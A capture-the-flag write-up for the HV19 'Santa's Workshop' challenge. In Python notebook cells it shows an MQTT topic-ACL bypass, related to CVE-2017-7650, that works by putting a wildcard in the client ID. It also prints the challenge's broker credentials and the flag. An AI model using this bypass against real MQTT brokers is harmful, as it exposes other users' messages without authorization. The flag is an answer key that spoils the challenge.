# HV19.15 Santa's Workshop

*The Elves are working very hard. Look at http://whale.hacking-lab.com:2080/ to see how busy they are.*
        
On that website, we can find a counter:
    
![Website screenshot](./elves.png)

Looking at the JavaScript source, we find a [MQTT](https://en.wikipedia.org/wiki/MQTT) connection used to increment the counter. We also find out that the flag seems to be published via MQTT as well:

```js
var topic = 'HV19/gifts/'+clientid;
// var topic = 'HV19/gifts/'+clientid+'/flag-tbd';
```

I started with replicating what the website does in Python - I first didn't get it to run, until I got a hint that I need to set `transport="websockets"` for it to be equivalent with the JavaScript code. I also added a counter so that the loop automatically exits after getting 5 messages. I mainly use that to have a clean way to exit the mainloop for this writeup.

After that, I got gift counter messages via Python and [paho-mqtt](https://pypi.org/project/paho-mqtt/):

In [17]:
import logging
import paho.mqtt.client as mqtt
import itertools


CID = "0483191873374145"
USER = "workshop"
PASS = "2fXc7AWINBXyruvKLiX"
HOST = "whale.hacking-lab.com"
PORT = 9001
TOPIC = f"HV19/gifts/{CID}"
LIMIT = 5

counter = None


def on_connect(client, userdata, flags, rc):
    if rc != 0:
        print(f"Failed to connect: {rc}")

    client.subscribe(TOPIC)
    
    global counter
    counter = itertools.count(start=1)


def on_message(client, userdata, msg):
    print(msg.topic + " " + str(msg.payload))
    if next(counter) == LIMIT:
        client.disconnect()

        
def run(client):
    client.enable_logger()
    logging.basicConfig(level=logging.DEBUG)

    client.username_pw_set(USER, PASS)

    client.on_connect = on_connect
    client.on_message = on_message

    client.connect(HOST, PORT)

    client.loop_forever()
    
client = mqtt.Client(client_id=CID, transport="websockets")
run(client)

DEBUG:paho.mqtt.client:Sending CONNECT (u1, p1, wr0, wq0, wf0, c1, k60) client_id=b'0483191873374145'
DEBUG:paho.mqtt.client:Received CONNACK (0, 0)
DEBUG:paho.mqtt.client:Sending SUBSCRIBE (d0, m1) [(b'HV19/gifts/0483191873374145', 0)]
DEBUG:paho.mqtt.client:Received SUBACK
DEBUG:paho.mqtt.client:Received PUBLISH (d0, q0, r0, m0), 'HV19/gifts/0483191873374145', ...  (7 bytes)


HV19/gifts/0483191873374145 b'7596557'


DEBUG:paho.mqtt.client:Received PUBLISH (d0, q0, r0, m0), 'HV19/gifts/0483191873374145', ...  (7 bytes)


HV19/gifts/0483191873374145 b'7596560'


DEBUG:paho.mqtt.client:Received PUBLISH (d0, q0, r0, m0), 'HV19/gifts/0483191873374145', ...  (7 bytes)


HV19/gifts/0483191873374145 b'7596569'


DEBUG:paho.mqtt.client:Received PUBLISH (d0, q0, r0, m0), 'HV19/gifts/0483191873374145', ...  (7 bytes)


HV19/gifts/0483191873374145 b'7596570'


DEBUG:paho.mqtt.client:Received PUBLISH (d0, q0, r0, m0), 'HV19/gifts/0483191873374145', ...  (7 bytes)
DEBUG:paho.mqtt.client:Sending DISCONNECT


HV19/gifts/0483191873374145 b'7596580'


I then did some reading about MQTT and found out that there are wildcards using [this article](https://www.hivemq.com/blog/mqtt-essentials-part-5-mqtt-topics-best-practices/). Let's try to get everything!

In [18]:
TOPIC = "#"
client.connect(HOST, PORT)
client.loop_forever()

DEBUG:paho.mqtt.client:Sending CONNECT (u1, p1, wr0, wq0, wf0, c1, k60) client_id=b'0483191873374145'
DEBUG:paho.mqtt.client:Received CONNACK (0, 0)
DEBUG:paho.mqtt.client:Sending SUBSCRIBE (d0, m2) [(b'#', 0)]
DEBUG:paho.mqtt.client:Received SUBACK
DEBUG:paho.mqtt.client:Received PUBLISH (d0, q0, r0, m0), 'HV19/gifts/0483191873374145', ...  (7 bytes)


HV19/gifts/0483191873374145 b'7596661'


DEBUG:paho.mqtt.client:Received PUBLISH (d0, q0, r0, m0), 'HV19/gifts/0483191873374145', ...  (7 bytes)


HV19/gifts/0483191873374145 b'7596664'


DEBUG:paho.mqtt.client:Received PUBLISH (d0, q0, r0, m0), 'HV19/gifts/0483191873374145', ...  (7 bytes)


...

DEBUG:paho.mqtt.client:Received PUBLISH (d0, q0, r0, m0), 'HV19/gifts/0483191873374145', ...  (7 bytes)


HV19/gifts/0483191873374145 b'7596677'


DEBUG:paho.mqtt.client:Received PUBLISH (d0, q0, r0, m0), 'HV19/gifts/0483191873374145', ...  (7 bytes)
DEBUG:paho.mqtt.client:Sending DISCONNECT


HV19/gifts/0483191873374145 b'7596686'


7

Hmm, nothing new there. I'd have expected to also see gift messages for other users at least, but I guess there are some access controls which prevent that.

The article above mentions:

> Topics that start with a \$ symbol have a different purpose. These topics are not part of the subscription when you subscribe to the multi-level wildcard as a topic (#). **The \$-symbol topics are reserved for internal statistics of the MQTT broker.**

So let's check whether there's something interesting to see there!

In [19]:
TOPIC = f"$SYS/#"
LIMIT = 1
client.connect(HOST, PORT)
client.loop_forever()

DEBUG:paho.mqtt.client:Sending CONNECT (u1, p1, wr0, wq0, wf0, c1, k60) client_id=b'0483191873374145'
DEBUG:paho.mqtt.client:Received CONNACK (0, 0)
DEBUG:paho.mqtt.client:Sending SUBSCRIBE (d0, m3) [(b'$SYS/#', 0)]
DEBUG:paho.mqtt.client:Received PUBLISH (d0, q0, r1, m0), '$SYS/broker/version', ...  (157 bytes)
DEBUG:paho.mqtt.client:Sending DISCONNECT
DEBUG:paho.mqtt.client:Received SUBACK


$SYS/broker/version b'mosquitto version 1.4.11 (We elves are super-smart and know about CVE-2017-7650 and the POC. So we made a genious fix you never will be able to pass. Hohoho)'


7

Oh, that's interesting! The message informs us about [CVE-2017-7650](http://cve.circl.lu/cve/CVE-2017-7650):

> In Mosquitto before 1.4.12, pattern based ACLs can be bypassed by clients that set their username/client id to '#' or '+'. This allows locally or remotely connected clients to access MQTT topics that they do have the rights to.

From the [related bug report](https://bugs.eclipse.org/bugs/show_bug.cgi?id=516765) and the [attached patch](https://bugs.eclipse.org/bugs/attachment.cgi?id=268603) we get some more information. The upstream patch seems fine, but it looks like the elves fixed it in a different way, which apparently can be circumvented somehow.

I first tried the obvious thing, a client ID of `#`, but that doesn't let us connect at all:

In [ ]:
TOPIC = "#"
CID = "#"

client = mqtt.Client(client_id=CID, transport="websockets")
run(client)

The client ID is part of the published topic as well. So I did a guess - what if I used `0483191873374145/#` as client ID, so that (maybe) the server sends to `HV19/gifts/0483191873374145/#` or so?

In [24]:
LIMIT = 5
CID = "0483191873374145/#"
client = mqtt.Client(client_id=CID, transport="websockets")
run(client)

DEBUG:paho.mqtt.client:Sending CONNECT (u1, p1, wr0, wq0, wf0, c1, k60) client_id=b'0483191873374145/#'
DEBUG:paho.mqtt.client:Received CONNACK (0, 0)
DEBUG:paho.mqtt.client:Sending SUBSCRIBE (d0, m1) [(b'#', 0)]
DEBUG:paho.mqtt.client:Received PUBLISH (d0, q0, r1, m0), 'HV19/gifts/0483191873374145/HV19{N0_1nput_v4l1d4t10n_3qu4ls_d1s4st3r}', ...  (70 bytes)
DEBUG:paho.mqtt.client:Received SUBACK


HV19/gifts/0483191873374145/HV19{N0_1nput_v4l1d4t10n_3qu4ls_d1s4st3r} b'Congrats, you got it. The elves should not overrate their smartness!!!'


DEBUG:paho.mqtt.client:Received PUBLISH (d0, q0, r0, m0), 'HV19/gifts/0483191873374145/HV19{N0_1nput_v4l1d4t10n_3qu4ls_d1s4st3r}', ...  (70 bytes)
DEBUG:paho.mqtt.client:Received PUBLISH (d0, q0, r0, m0), 'HV19/gifts/0483191873374145', ...  (7 bytes)


HV19/gifts/0483191873374145/HV19{N0_1nput_v4l1d4t10n_3qu4ls_d1s4st3r} b'Congrats, you got it. The elves should not overrate their smartness!!!'
HV19/gifts/0483191873374145 b'7599123'


DEBUG:paho.mqtt.client:Received PUBLISH (d0, q0, r0, m0), 'HV19/gifts/0483191873374145/HV19{N0_1nput_v4l1d4t10n_3qu4ls_d1s4st3r}', ...  (70 bytes)
DEBUG:paho.mqtt.client:Received PUBLISH (d0, q0, r0, m0), 'HV19/gifts/0483191873374145', ...  (7 bytes)
DEBUG:paho.mqtt.client:Sending DISCONNECT


HV19/gifts/0483191873374145/HV19{N0_1nput_v4l1d4t10n_3qu4ls_d1s4st3r} b'Congrats, you got it. The elves should not overrate their smartness!!!'
HV19/gifts/0483191873374145 b'7599128'


And indeed, the flag is `HV19{N0_1nput_v4l1d4t10n_3qu4ls_d1s4st3r}`.